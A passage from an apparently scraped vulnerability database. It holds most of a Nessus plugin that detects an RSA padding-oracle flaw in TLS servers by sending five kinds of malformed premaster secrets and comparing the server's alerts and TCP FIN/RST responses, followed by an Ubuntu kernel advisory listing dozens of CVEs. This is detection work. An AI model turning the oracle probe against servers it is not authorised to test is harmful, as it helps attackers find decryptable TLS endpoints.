or an Affiliate thereof.\");\n\n script_dependencies(\"ssl_supported_versions.nasl\");\n script_require_keys(\"Settings/ParanoidReport\");\n script_require_ports(\"SSL/Supported\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"x509_func.inc\");\ninclude(\"rsync.inc\");\ninclude(\"ftp_func.inc\");\ninclude(\"ldap_func.inc\");\ninclude(\"nntp_func.inc\");\ninclude(\"smtp_func.inc\");\ninclude(\"telnet2_func.inc\");\ninclude(\"ssl_funcs.inc\");\ninclude(\"string.inc\");\ninclude(\"spad_log_func.inc\");\n\n# Paranoia added as some services are not exploitable\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n##\n# Checks whether a cipher is in a list of cipher suites.\n#\n# @anonparam cipher Cipher in question.\n# @anonparam ciphers List of cipher suites.\n#\n# @return TRUE for success, FALSE otherwise.\n##\nfunction tls_cipher_in_list()\n{\n local_var cipher, ciphers, i, id, len;\n\n cipher = _FCT_ANON_ARGS[0];\n ciphers = _FCT_ANON_ARGS[1];\n\n len = strlen(ciphers);\n for (i = 0; i < len; i += 2)\n {\n id = substr(ciphers, i, i + 2 - 1);\n if (cipher == id) return TRUE;\n }\n\n return FALSE;\n}\n\nPREMASTER_TYPE_CORRECT = 2;\nPREMASTER_TYPE_WRONG_FIRST_BYTES = 3;\nPREMASTER_TYPE_WRONG_ZERO_POS = 4;\nPREMASTER_TYPE_MISSING_ZERO = 5;\nPREMASTER_TYPE_WRONG_VERSION = 6;\nfunction make_premaster(modulus_length, premaster_type)\n{\n local_var pad_length, premaster;\n # See https://tools.ietf.org/html/rfc2246#section-7.4.7.1\n # PKCS#1 v1.5 format: [2 header bytes + nonzero padding + 0x00 byte + 2-byte version + 46-byte premaster]\n pad_length = (modulus_length - 2 - 1 - 2 - 46);\n premaster = \"nessusnessusnessusnessusnessusnessusnessusness\";\n\n switch (premaster_type)\n {\n case PREMASTER_TYPE_CORRECT:\n return '\\x00\\x02' + crap(data:'N', length:pad_length) + '\\x00\\x03\\x03' + premaster;\n case PREMASTER_TYPE_WRONG_FIRST_BYTES:\n return '\\x05\\x05' + crap(data:'N', length:pad_length) + '\\x00\\x03\\x03' + premaster;\n 
case PREMASTER_TYPE_WRONG_ZERO_POS:\n return '\\x00\\x02' + crap(data:'N', length:pad_length) + '\\xff' + premaster + '\\x00\\x11';\n case PREMASTER_TYPE_MISSING_ZERO:\n return '\\x00\\x02' + crap(data:'N', length:pad_length) + '\\xff\\x03\\x03' + premaster;\n case PREMASTER_TYPE_WRONG_VERSION:\n return '\\x00\\x02' + crap(data:'N', length:pad_length) + '\\x00\\x05\\x05' + premaster;\n }\n}\n\n##\n# We don't generate the premaster ahead of time, in case the\n# server sends a different RSA certificate depending on ciphersuite.\n##\nfunction attack(port, ciphers, premaster_type, send_tls_finished_msg)\n{\n local_var soc, data, rec, srv_random, clt_random, version, cipher_desc;\n local_var cert, clt_cert_requested, skex, n, e, dh_privkey;\n local_var ckex, keyblk, tls_keys, tls_ciphertext, pubkey, ivlen, maclen, blocklen;\n local_var result, bpf, packet, err, ip_header_size, tcp_header, fin, rst;\n local_var loop_count;\n\n # Get a socket to perform a handshake.\n soc = open_sock_ssl(port);\n if (!soc)\n return [FALSE, \"open_sock_ssl\", \"Couldn't begin SSL handshake\"];\n\n data = client_hello(\n v2hello:FALSE,\n version:mkword(SSL_V3), # Record-layer version (RFC5246 Appendix E)\n maxver:mkword(TLS_12), # Handshake version; maximum we support\n cipherspec:ciphers,\n extensions:tls_ext_sni(hostname:get_host_name())\n );\n # Send the ClientHello\n send(socket:soc, data:data);\n\n # Read records one at a time. 
Expect to see at a minimum:\n # ServerHello, Certificate, and ServerHelloDone.\n loop_count = 0;\n while (TRUE)\n {\n if (loop_count++ > 50)\n exit(1, \"Exceeded maximum number of loops while waiting for server's first flight of messages.\");\n\n # Receive a record from the server.\n data = recv_ssl(socket:soc);\n if (isnull(data))\n {\n close(soc);\n return [FALSE, \"recv_ssl\", \"Did not receive an expected SSL message from the server\"];\n }\n\n # ServerHello: Extract the random data for computation of keys.\n rec = ssl_find(\n blob:data,\n 'content_type', SSL3_CONTENT_TYPE_HANDSHAKE,\n 'handshake_type', SSL3_HANDSHAKE_TYPE_SERVER_HELLO\n );\n if (!isnull(rec))\n {\n # If server asks for version less than SSLv3 or higher than TLS 1.2, fail.\n if (rec['handshake_version'] < SSL_V3 || rec['handshake_version'] > TLS_12)\n return [FALSE, \"handshake_version\", \"Server selected a TLS version we don't support\"];\n\n # Use the TLS version the server wants\n version = rec['handshake_version'];\n\n srv_random = mkdword(rec['time']) + rec['random'];\n\n # Wacko SSL servers might return a cipher suite not in the\n # client's request list.\n if (!tls_cipher_in_list(mkword(rec['cipher_spec']), ciphers))\n {\n close(soc);\n return [FALSE, \"cipher_spec\", \"Server ignored our list of supported ciphers\"];\n }\n\n # Store the negotiated cipher suite.\n cipher_desc = ciphers_desc[cipher_name(id:rec['cipher_spec'])];\n\n if (isnull(cipher_desc))\n {\n close(soc);\n return [FALSE, \"cipher_spec\", \"Assertion failure\"];\n }\n }\n\n # Certificate: Extract the server's public key.\n rec = ssl_find(\n blob:data,\n 'content_type', SSL3_CONTENT_TYPE_HANDSHAKE,\n 'handshake_type', SSL3_HANDSHAKE_TYPE_CERTIFICATE\n );\n if (!isnull(rec) && max_index(rec['certificates']) > 0)\n {\n # First cert in the chain should be the server cert.\n cert = parse_der_cert(cert:rec['certificates'][0]);\n if (isnull(cert))\n {\n close(soc);\n return [FALSE, \"parse_der_cert\", \"Failed to parse 
server's certificate\"];\n }\n cert = cert['tbsCertificate'];\n }\n\n # Server Key Exchange.\n # Normally RSA handshakes don't have this, but we can check EXPORT ciphers this way.\n rec = ssl_find(\n blob:data,\n 'content_type', SSL3_CONTENT_TYPE_HANDSHAKE,\n 'handshake_type', SSL3_HANDSHAKE_TYPE_SERVER_KEY_EXCHANGE\n );\n if (!isnull(rec['data']))\n skex = ssl_parse_srv_kex(blob:rec['data'], cipher:cipher_desc, version:version);\n\n # Certificate Request.\n rec = ssl_find(\n blob:data,\n 'content_type', SSL3_CONTENT_TYPE_HANDSHAKE,\n 'handshake_type', SSL3_HANDSHAKE_TYPE_CERTIFICATE_REQUEST\n );\n if (!isnull(rec['data']))\n clt_cert_requested = TRUE;\n\n # Server Hello Done.\n rec = ssl_find(\n blob:data,\n 'content_type', SSL3_CONTENT_TYPE_HANDSHAKE,\n 'handshake_type', SSL3_HANDSHAKE_TYPE_SERVER_HELLO_DONE\n );\n # When we get a ServerHelloDone, it's our turn to send again.\n if (!isnull(rec))\n break;\n\n # Is it an alert?\n rec = ssl_find(\n blob:data,\n encrypted:FALSE,\n 'content_type', SSL3_CONTENT_TYPE_ALERT\n );\n if (!isnull(rec))\n {\n close(soc);\n return [FALSE, \"handshake_failure\", \"Server sent alert to ClientHello. Level: \" + rec['level'] + \", description: \" + rec['description']];\n }\n }\n\n data = '';\n # Create an empty client certificate if one is requested.\n if (clt_cert_requested)\n {\n # Send an empty certificate for now. 
TLSv1.0 says the client can\n # send an empty certificate.\n data += ssl_mk_record(\n type:SSL3_CONTENT_TYPE_HANDSHAKE,\n version:version,\n data:ssl_mk_handshake_msg(\n type : SSL3_HANDSHAKE_TYPE_CERTIFICATE,\n data : ssl_vldata_put(data:NULL,len:3)\n )\n );\n }\n\n # Process ServerCertificate and ServerKeyExchange messages.\n if (cipher_field(name:cipher_desc, field:\"kex\") !~ \"RSA($|\\()\")\n {\n close(soc);\n return [FALSE, \"kx\", \"Unsupported key exchange method\"];\n }\n\n if (isnull(cert))\n {\n close(soc);\n return [FALSE, \"rsa_kx\", \"Server selected RSA key exchange but didn't provide a certificate\"];\n }\n\n if (isnull(cert['subjectPublicKeyInfo']) || isnull(cert['subjectPublicKeyInfo'][1]))\n {\n close(soc);\n return [FALSE, \"rsa_kx\", \"A server certificate with an unsupported algorithm was found.\"];\n }\n\n n = cert['subjectPublicKeyInfo'][1][0];\n e = cert['subjectPublicKeyInfo'][1][1];\n\n if (isnull(n) || isnull(e))\n {\n close(soc);\n return [FALSE, \"rsa_kx\", \"Failed to extract public key from server certificate.\"];\n }\n\n # Round-trip the modulus to get rid of any leading zeroes.\n n = bn_hex2raw(bn_raw2hex(n));\n\n # Encrypt the premaster secret with server's RSA public key.\n ckex = bn_mod_exp(make_premaster(modulus_length:strlen(n), premaster_type:premaster_type), e, n);\n ckex = ssl_vldata_put(data:ckex, len:2);\n\n # Create a ClientKeyExchange record\n data += ssl_mk_record(\n type:SSL3_CONTENT_TYPE_HANDSHAKE,\n version:version,\n data:ssl_mk_handshake_msg(\n type:SSL3_HANDSHAKE_TYPE_CLIENT_KEY_EXCHANGE,\n data:ckex\n )\n );\n\n if (send_tls_finished_msg)\n {\n data += tls_mk_record(\n type:SSL3_CONTENT_TYPE_CHANGECIPHERSPEC,\n data:mkbyte(1),\n version:version\n );\n\n # Figure out IV, MAC, and padding length of the cipher we're using. If we\n # send an incorrectly-sized Finished message, the server can reject us\n # without ever attempting to decrypt it, and we don't want this. 
We want it\n # to look legitimate and for the server to give us its real \"decryption\n # failed\" alert.\n var encrypt = cipher_field(name:cipher_desc, field:\"encrypt\");\n if (\"AES-GCM\" >< encrypt)\n {\n ivlen = 8; # 8-byte explicit nonce carried in the record (RFC 5288)\n maclen = 16; # 16-byte GCM authentication tag\n # AES-GCM is AES-CTR plus a GHASH tag and adds no padding, so treat it as a stream cipher\n blocklen = 1;\n }\n else\n {\n if (\"3DES-CBC\" >< encrypt || \"DES-CBC\" >< encrypt)\n blocklen = 8;\n else if (\"AES-CBC\" >< encrypt)\n blocklen = 16;\n # Camellia (Japanese cipher, 128-bit block)\n else if (\"Camellia\" >< encrypt)\n blocklen = 16;\n # SEED (South Korean cipher, 128-bit block)\n else if (\"SEED-CBC\" >< encrypt)\n blocklen = 16;\n # Safe guess; SSL implementations check that a ciphertext is divisible by the block length.\n # DES block length (8) and AES and CAMELLIA block length (16) both evenly divide 16.\n else\n blocklen = 16;\n\n # These CBC ciphers all use an IV length that's the same as the block length\n ivlen = blocklen;\n\n # MAC will be either SHA256 or SHA1. None of the RSA key-exchange CBC ciphersuites we offer use SHA384.\n if (\"SHA256\" >< cipher_field(name:cipher_desc, field:\"mac\"))\n maclen = 32;\n else\n maclen = 20;\n }\n\n # Make a fake Finished message. This is designed to trigger a bad_record_mac\n # or similar TLS alert. The encrypted \"finished hash\" is 12 bytes, so we\n # start with that. 
We tack on a fake MAC, and round up to the nearest block\n # size as if it were properly encrypted.\n tls_ciphertext = ssl_mk_handshake_msg(type:SSL3_HANDSHAKE_TYPE_FINISHED, data:crap(data:'Finished', length:12));\n # Tag on the fake MAC\n tls_ciphertext += crap(data:'Mac', length:maclen);\n # Add on some bytes to satisfy padding length requirements, if it's a block cipher\n if (blocklen > 1)\n tls_ciphertext += crap(data:'Padding', length:blocklen - (strlen(tls_ciphertext) % blocklen));\n\n # Add on an explicit IV (or the GCM explicit nonce) if we're using TLS v1.1 or higher\n if (version >= TLS_11)\n tls_ciphertext = crap(data:'Iv', length:ivlen) + tls_ciphertext;\n\n data += tls_mk_record(\n type:SSL3_CONTENT_TYPE_HANDSHAKE,\n data:tls_ciphertext,\n version:version\n );\n }\n\n if (isnull(soc) || port <= 0 || get_source_port(soc) <= 0)\n exit(1, \"Invalid socket for a packet capture instance (src port \"+string(get_source_port(soc))+\", dest port \"+string(port)+\").\");\n\n # Try to catch the server closing the connection. We want to catch either an RST or a FIN.\n bpf = bpf_open(\n 'tcp and src port ' + port +\n ' and src host ' + get_host_ip() +\n ' and dst host ' + compat::this_host() +\n ' and dst port ' + get_source_port(soc) +\n ' and tcp[tcpflags] & (tcp-fin|tcp-rst) != 0'\n );\n if (!bpf)\n exit(1, \"Couldn't open a packet capture instance.\");\n\n # Send the TLS messages\n # If we're using the full handshake this will be ClientKeyExchange + ChangeCipherSpec + Finished\n # If we're using the abbreviated handshake this will be just ClientKeyExchange\n send(socket:soc, data:data);\n\n # The \"fingerprint\" of the server's behaviour for this one probe\n result = [];\n\n # The effect of this loop is to receive as many times as possible and store\n # all the TLS records received. 
Allegedly, some implementations will send\n # more than one TLS alert (!?).\n # At the end when nothing more can be received, we check why; did the server\n # leave the connection open and just stop sending, or close with a FIN or\n # RST? And then add that onto the end of the list.\n # The idea is this becomes a \"fingerprint\" of the server's behaviour, and\n # then we can compare fingerprints from the different types of malformed\n # premaster secret and see if an oracle exists.\n loop_count = 0;\n while (TRUE)\n {\n if (loop_count++ > 50)\n exit(1, \"Exceeded maximum number of loops while waiting for server's response to tampered RSA key exchange.\");\n\n # Receive a record from the server.\n # Set the timeout explicitly, because we don't want to be affected by\n # the Nessus check_read_timeout setting.\n data = recv_ssl(socket:soc, timeout:5);\n if (isnull(data))\n {\n if (socket_get_error(soc) == ETIMEDOUT)\n {\n result[max_index(result)] = \"server waited\";\n }\n else if (socket_get_error(soc) == ECONNRESET)\n {\n # Try to tell apart FIN and RST\n packet = bpf_next(bpf:bpf, timeout:0);\n if (isnull(packet))\n {\n err = \"Did not receive an expected FIN or RST packet from port \" + port;\n }\n else\n {\n if (TARGET_IS_IPV6)\n ip_header_size = 40;\n else\n ip_header_size = 20;\n # Carve out the TCP header. This assumes a 14-byte Ethernet header and\n # no IPv4 options or IPv6 extension headers in front of TCP.\n tcp_header = substr(packet, 14 + ip_header_size, 14 + ip_header_size + 20);\n # TCP flags byte is at offset 13 of the TCP header: FIN = 0x01, RST = 0x04\n fin = ord(tcp_header[13]) & 1;\n rst = ord(tcp_header[13]) & 4;\n if (fin)\n result[max_index(result)] = \"server sent TCP FIN\";\n else if (rst)\n result[max_index(result)] = \"server sent TCP RST\";\n else\n {\n err = \"Did not receive an expected FIN or RST packet from port \" + port;\n }\n }\n }\n else\n {\n err = \"Unexpected socket error status after receiving: \" + socket_get_error(soc);\n }\n\n bpf_close(bpf);\n close(soc);\n\n if (err)\n exit(1, err + \".\");\n else\n break;\n }\n\n # Is it an alert?\n rec = ssl_find(\n blob:data,\n encrypted:FALSE,\n 'content_type', 
SSL3_CONTENT_TYPE_ALERT\n );\n if (!isnull(rec))\n result[max_index(result)] = \"server sent TLS alert \" + string(rec['description']);\n }\n return result;\n}\n\nget_kb_item_or_exit('SSL/Supported');\n# Get a port that uses SSL.\nport = get_ssl_ports(fork:TRUE);\nif (isnull(port))\n exit(1, 'The host does not appear to have any SSL-based services.');\n\n# Find out if the port is open.\nif (!get_port_state(port))\n audit(AUDIT_PORT_CLOSED, port, \"TCP\");\n\n# CBC ciphers that don't use AES\ncipher_list_cbc_not_aes =\n ciphers['TLS1_CK_RSA_WITH_3DES_EDE_CBC_SHA'] +\n ciphers['TLS1_CK_RSA_WITH_CAMELLIA_128_CBC_SHA'] +\n ciphers['TLS1_CK_RSA_WITH_CAMELLIA_256_CBC_SHA'] +\n ciphers['TLS1_CK_RSA_WITH_SEED_CBC_SHA'];\n\n# Just AES-CBC ciphers\ncipher_list_aes_cbc =\n ciphers['TLS1_CK_RSA_WITH_AES_128_CBC_SHA'] + # <- Required by all TLS 1.2 impls.\n ciphers['TLS1_CK_RSA_WITH_AES_256_CBC_SHA'] +\n ciphers['TLS1_RSA_WITH_AES_128_CBC_SHA256'] +\n ciphers['TLS1_RSA_WITH_AES_256_CBC_SHA256'];\n\n# Just AES-GCM ciphers\ncipher_list_gcm =\n ciphers['TLS12_RSA_WITH_AES_128_GCM_SHA256'] +\n ciphers['TLS12_RSA_WITH_AES_256_GCM_SHA384'];\n\n# This just collects the responses for all the premasters and returns them.\n# If there was a handshake error or if the responses were all the same,\n# NULL is returned.\nfunction try_with_all_premasters(cipher_list, port, send_tls_finished_msg)\n{\n local_var response, responses, premasters, premaster, correct_premaster_reponse;\n\n premasters = [\n PREMASTER_TYPE_CORRECT,\n PREMASTER_TYPE_WRONG_FIRST_BYTES,\n PREMASTER_TYPE_WRONG_ZERO_POS,\n PREMASTER_TYPE_MISSING_ZERO,\n PREMASTER_TYPE_WRONG_VERSION\n ];\n\n spad_log(message:\"Port: \" + port + \", ciphers: \" + hexstr(cipher_list) + \", send_tls_finished_msg: \" + int(send_tls_finished_msg) + \".\");\n responses = [];\n foreach premaster (premasters)\n {\n response = attack(\n port:port,\n ciphers:cipher_list,\n premaster_type:premaster,\n send_tls_finished_msg:send_tls_finished_msg\n );\n 
# The return value is like [FALSE, \"step\", \"human-readable message\"] when\n # there's a connection error.\n # If there was a connection error it's probably because the server doesn't\n # support the ciphers we tried with, so bail out early here.\n if (typeof(response[0]) == \"int\" && response[0] == FALSE)\n {\n spad_log(message:\"Connection failed: \" + response[2] + \".\");\n return NULL;\n }\n\n responses[len(responses)] = response;\n }\n spad_log(message:\"All premasters tested. Ciphers appear supported.\");\n\n foreach response (responses)\n {\n # If the server replied differently to any of the malformed premasters\n # that we tried, compared to the correctly-formatted premaster, then\n # the server is vulnerable.\n correct_premaster_reponse = responses[0];\n if (!equals(correct_premaster_reponse, response))\n return responses;\n }\n\n # All the responses were the same. Server isn't vulnerable to this particular attack.\n return NULL;\n}\n\n# We'll try with the full handshake first. It's faster, because we always end\n# with sending an invalid encrypted Finished message, which the server can\n# respond to immediately.\n# When we don't send a Finished and stop after sending the ClientKeyExchange,\n# the *correct* thing for the server to do is to wait and so we'll end up\n# waiting a lot.\nforeach send_tls_finished_msg ([TRUE, FALSE])\n{\n foreach cipher_list ([cipher_list_gcm, cipher_list_aes_cbc + cipher_list_cbc_not_aes])\n {\n responses = try_with_all_premasters(\n cipher_list:cipher_list,\n port:port,\n send_tls_finished_msg:send_tls_finished_msg\n );\n # We get back null if the server isn't vulnerable with these\n # ciphers, or if the server didn't support them at all.\n if (isnull(responses))\n continue;\n\n # We got back a list of responses. Try the same attack once more and compare\n # the responses to the first attempt. 
If they're the same, then the server\n # is vulnerable.\n # We try twice because this is what the other detection tools do, and it makes\n # sense because some of the oracles rely on the server timing out.\n responses2 = try_with_all_premasters(\n cipher_list:cipher_list,\n port:port,\n send_tls_finished_msg:send_tls_finished_msg\n );\n # This does a deep equality check.\n if (equals(responses2, responses))\n {\n if (send_tls_finished_msg)\n attack_type = \"sent a TLS Finished message with incorrect padding\";\n else\n attack_type = \"waited, without sending a TLS Finished message\";\n\n report =\n '\\nThe test sent a crafted RSA ciphertext and then ' + attack_type + '.' +\n '\\nThe following differences in behaviour were seen by Nessus :' +\n '\\n - As a baseline with correct formatting : ' + join(responses[0], sep:', ') +\n '\\n - With incorrect leading bytes : ' + join(responses[1], sep:', ') +\n '\\n - With the 0x00 byte in incorrect place : ' + join(responses[2], sep:', ') +\n '\\n - With the 0x00 byte missing : ' + join(responses[3], sep:', ') +\n '\\n - With an incorrect version number : ' + join(responses[4], sep:', ');\n security_report_v4(\n port:port,\n extra:report,\n severity:SECURITY_HOLE\n );\n exit(0);\n }\n }\n}\nexit(0, \"The SSL/TLS service at port \" + port + \" does not appear to be vulnerable.\");\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2021-03-01T07:39:59", "description": "It was discovered that the alarmtimer implementation in the Linux\nkernel contained an integer overflow vulnerability. A local attacker\ncould use this to cause a denial of service. (CVE-2018-13053)\n\nWen Xu discovered that the XFS filesystem implementation in the Linux\nkernel did not properly track inode validations. An attacker could use\nthis to construct a malicious XFS image that, when mounted, could\ncause a denial of service (system crash). 
(CVE-2018-13093)\n\nWen Xu discovered that the f2fs file system implementation in the\nLinux kernel did not properly validate metadata. An attacker could use\nthis to construct a malicious f2fs image that, when mounted, could\ncause a denial of service (system crash). (CVE-2018-13096,\nCVE-2018-13097, CVE-2018-13098, CVE-2018-13099, CVE-2018-13100,\nCVE-2018-14614, CVE-2018-14615, CVE-2018-14616)\n\nWen Xu and Po-Ning Tseng discovered that the btrfs file system\nimplementation in the Linux kernel did not properly validate metadata.\nAn attacker could use this to construct a malicious btrfs image that,\nwhen mounted, could cause a denial of service (system crash).\n(CVE-2018-14609, CVE-2018-14610, CVE-2018-14611, CVE-2018-14612,\nCVE-2018-14613)\n\nWen Xu discovered that the HFS+ filesystem implementation in the Linux\nkernel did not properly handle malformed catalog data in some\nsituations. An attacker could use this to construct a malicious HFS+\nimage that, when mounted, could cause a denial of service (system\ncrash). (CVE-2018-14617)\n\nVasily Averin and Pavel Tikhomirov discovered that the cleancache\nsubsystem of the Linux kernel did not properly initialize new files in\nsome situations. A local attacker could use this to expose sensitive\ninformation. (CVE-2018-16862)\n\nHui Peng and Mathias Payer discovered that the Option USB High Speed\ndriver in the Linux kernel did not properly validate metadata received\nfrom the device. A physically proximate attacker could use this to\ncause a denial of service (system crash). (CVE-2018-19985)\n\nHui Peng and Mathias Payer discovered that the USB subsystem in the\nLinux kernel did not properly handle size checks when handling an\nextra USB descriptor. A physically proximate attacker could use this\nto cause a denial of service (system crash). (CVE-2018-20169)\n\nZhipeng Xie discovered that an infinite loop could be triggered in the\nCFS Linux kernel process scheduler. 
A local attacker could possibly\nuse this to cause a denial of service. (CVE-2018-20784)\n\nIt was discovered that a use-after-free error existed in the block\nlayer subsystem of the Linux kernel when certain failure conditions\noccurred. A local attacker could possibly use this to cause a denial\nof service (system crash) or possibly execute arbitrary code.\n(CVE-2018-20856)\n\nEli Biham and Lior Neumann discovered that the Bluetooth\nimplementation in the Linux kernel did not properly validate elliptic\ncurve parameters during Diffie-Hellman key exchange in some\nsituations. An attacker could use this to expose sensitive\ninformation. (CVE-2018-5383)\n\nIt was discovered that the Intel wifi device driver in the Linux\nkernel did not properly validate certain Tunneled Direct Link Setup\n(TDLS). A physically proximate attacker could use this to cause a\ndenial of service (wifi disconnect). (CVE-2019-0136)\n\nIt was discovered that a heap buffer overflow existed in the Marvell\nWireless LAN device driver for the Linux kernel. An attacker could use\nthis to cause a denial of service (system crash) or possibly execute\narbitrary code. (CVE-2019-10126)\n\nIt was discovered that the Bluetooth UART implementation in the Linux\nkernel did not properly check for missing tty operations. A local\nattacker could use this to cause a denial of service. (CVE-2019-10207)\n\nAmit Klein and Benny Pinkas discovered that the Linux kernel did not\nsufficiently randomize IP ID values generated for connectionless\nnetworking protocols. A remote attacker could use this to track\nparticular Linux devices. (CVE-2019-10638)\n\nAmit Klein and Benny Pinkas discovered that the location of kernel\naddresses could be exposed by the implementation of connection-less\nnetwork protocols in the Linux kernel. A remote attacker could\npossibly use this to assist in the exploitation of another\nvulnerability in the Linux kernel. 
(CVE-2019-10639)\n\nAdam Zabrocki discovered that the Intel i915 kernel mode graphics\ndriver in the Linux kernel did not properly restrict mmap() ranges in\nsome situations. A local attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code.\n(CVE-2019-11085)\n\nIt was discovered that an integer overflow existed in the Linux kernel\nwhen reference counting pages, leading to potential use-after-free\nissues. A local attacker could use this to cause a denial of service\n(system crash) or possibly execute arbitrary code. (CVE-2019-11487)\n\nJann Horn discovered that a race condition existed in the Linux kernel\nwhen performing core dumps. A local attacker could use this to cause a\ndenial of service (system crash) or expose sensitive information.\n(CVE-2019-11599)\n\nIt was discovered that a NULL pointer dereference vulnerability\nexisted in the LSI Logic MegaRAID driver in the Linux kernel. A local\nattacker could use this to cause a denial of service (system crash).\n(CVE-2019-11810)\n\nIt was discovered that a race condition leading to a use-after-free\nexisted in the Reliable Datagram Sockets (RDS) protocol implementation\nin the Linux kernel. The RDS protocol is blacklisted by default in\nUbuntu. If enabled, a local attacker could use this to cause a denial\nof service (system crash) or possibly execute arbitrary code.\n(CVE-2019-11815)\n\nIt was discovered that the ext4 file system implementation in the\nLinux kernel did not properly zero out memory in some situations. A\nlocal attacker could use this to expose sensitive information (kernel\nmemory). (CVE-2019-11833)\n\nIt was discovered that the Bluetooth Human Interface Device Protocol\n(HIDP) implementation in the Linux kernel did not properly verify\nstrings were NULL terminated in certain situations. 
A local attacker\ncould use this to expose sensitive information (kernel memory).\n(CVE-2019-11884)\n\nIt was discovered that a NULL pointer dereference vulnerability existed\nin the Near-field communication (NFC) implementation in the Linux\nkernel. An attacker could use this to cause a denial of service\n(system crash). (CVE-2019-12818)\n\nIt was discovered that the MDIO bus devices subsystem in the Linux\nkernel improperly dropped a device reference in an error condition,\nleading to a use-after-free. An attacker could use this to cause a\ndenial of service (system crash). (CVE-2019-12819)\n\nIt was discovered that a NULL pointer dereference vulnerability\nexisted in the Near-field communication (NFC) implementation in the\nLinux kernel. A local attacker could use this to cause a denial of\nservice (system crash). (CVE-2019-12984)\n\nJann Horn discovered a use-after-free vulnerability in the Linux\nkernel when accessing LDT entries in some situations. A local attacker\ncould use this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2019-13233)\n\nJann Horn discovered that the ptrace implementation in the Linux\nkernel did not properly record credentials in some situations. A local\nattacker could use this to cause a denial of service (system crash) or\npossibly gain administrative privileges. (CVE-2019-13272)\n\nIt was discovered that the GTCO tablet input driver in the Linux\nkernel did not properly bounds check the initial HID report sent by\nthe device. A physically proximate attacker could use this to cause a\ndenial of service (system crash) or possibly execute arbitrary code.\n(CVE-2019-13631)\n\nIt was discovered that the floppy driver in the Linux kernel did not\nproperly validate metadata, leading to a buffer overread. 
A local\nattacker could use this to cause a denial of service (system crash).\n(CVE-2019-14283)\n\nIt was discovered that the floppy driver in the Linux kernel did not\nproperly validate ioctl() calls, leading to a division-by-zero. A\nlocal attacker could use this to cause a denial of service (system\ncrash). (CVE-2019-14284)\n\nTuba Yavuz discovered that a race condition existed in the DesignWare\nUSB3 DRD Controller device driver in the Linux kernel. A physically\nproximate attacker could use this to cause a denial of service.\n(CVE-2019-14763)\n\nIt was discovered that an out-of-bounds read existed in the QLogic\nQEDI iSCSI Initiator Driver in the Linux kernel. A local attacker\ncould possibly use this to expose sensitive information (kernel\nmemory). (CVE-2019-15090)\n\nIt was discovered that the Raremono AM/FM/SW radio device driver in\nthe Linux kernel did not properly allocate memory, leading to a\nuse-after-free. A physically proximate attacker could use this to\ncause a denial of service or possibly execute arbitrary code.\n(CVE-2019-15211)\n\nIt was discovered that a double-free error existed in the USB Rio 500\ndevice driver for the Linux kernel. A physically proximate attacker\ncould use this to cause a denial of service. (CVE-2019-15212)\n\nIt was discovered that a race condition existed in the Advanced Linux\nSound Architecture (ALSA) subsystem of the Linux kernel, leading to a\npotential use-after-free. A physically proximate attacker could use\nthis to cause a denial of service (system crash) or possibly execute\narbitrary code. (CVE-2019-15214)\n\nIt was discovered that a race condition existed in the CPiA2\nvideo4linux device driver for the Linux kernel, leading to a\nuse-after-free. A physically proximate attacker could use this to\ncause a denial of service (system crash) or possibly execute arbitrary\ncode. (CVE-2019-15215)\n\nIt was discovered that a race condition existed in the Softmac USB\nPrism54 device driver in the Linux kernel. 
A physically proximate\nattacker could use this to cause a denial of service (system crash).\n(CVE-2019-15220)\n\nIt was discovered that a use-after-free vulnerability existed in the\nAppletalk implementation in the Linux kernel if an error occurs during\ninitialization. A local attacker could use this to cause a denial of\nservice (system crash). (CVE-2019-15292)\n\nIt was discovered that the Empia EM28xx DVB USB device driver\nimplementation in the Linux kernel contained a use-after-free\nvulnerability when disconnecting the device. An attacker could use\nthis to cause a denial of service (system crash). (CVE-2019-2024)\n\nIt was discovered that the USB video device class implementation in\nthe Linux kernel did not properly validate control bits, resulting in\nan out-of-bounds buffer read. A local attacker could use this to\npossibly expose sensitive information (kernel memory). (CVE-2019-2101)\n\nIt was discovered that the Marvell Wireless LAN device driver in the\nLinux kernel did not properly validate the BSS descriptor. A local\nattacker could possibly use this to cause a denial of service (system\ncrash) or possibly execute arbitrary code. (CVE-2019-3846)\n\nJason Wang discovered that an infinite loop vulnerability existed in\nthe virtio net driver in the Linux kernel. A local attacker in a guest\nVM could possibly use this to cause a denial of service in the host\nsystem. (CVE-2019-3900)\n\nDaniele Antonioli, Nils Ole Tippenhauer, and Kasper B. Rasmussen\ndiscovered that the Bluetooth protocol BR/EDR specification did not\nproperly require sufficiently strong encryption key lengths. A\nphysically proximate attacker could use this to expose sensitive\ninformation. (CVE-2019-9506)\n\nIt was discovered that the Appletalk IP encapsulation driver in the\nLinux kernel did not properly prevent kernel addresses from being\ncopied to user space. 
A local attacker with the CAP_NET_ADMIN\ncapability could use this to expose sensitive information.\n(CVE-2018-20511)\n\nIt was discovered that a race condition existed in the USB YUREX\ndevice driver in the Linux kernel. A physically proximate attacker\ncould use this to cause a denial of service (system crash).\n(CVE-2019-15216)\n\nIt was discovered that the Siano USB MDTV receiver device driver in\nthe Linux kernel made improper assumptions about the device\ncharacteristics. A physically proximate attacker could use this to\ncause a denial of service (system crash). (CVE-2019-15218)\n\nIt was discovered that the Line 6 POD USB device driver in the Linux\nkernel did not properly validate data size information from the\ndevice. A physically proximate attacker could use this to cause a\ndenial of service (system crash). (CVE-2019-15221)\n\nMuyu Yu discovered that the CAN implementation in the Linux kernel in\nsome situations did not properly restrict the field size when\nprocessing outgoing frames. A local attacker with CAP_NET_ADMIN\nprivileges could use this to execute arbitrary code. (CVE-2019-3701)\n\nVladis Dronov discovered that the debug interface for the Linux\nkernel's HID subsystem did not properly validate passed parameters in\nsome situations. A local privileged attacker could use this to cause a\ndenial of service (infinite loop). (CVE-2019-3819).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
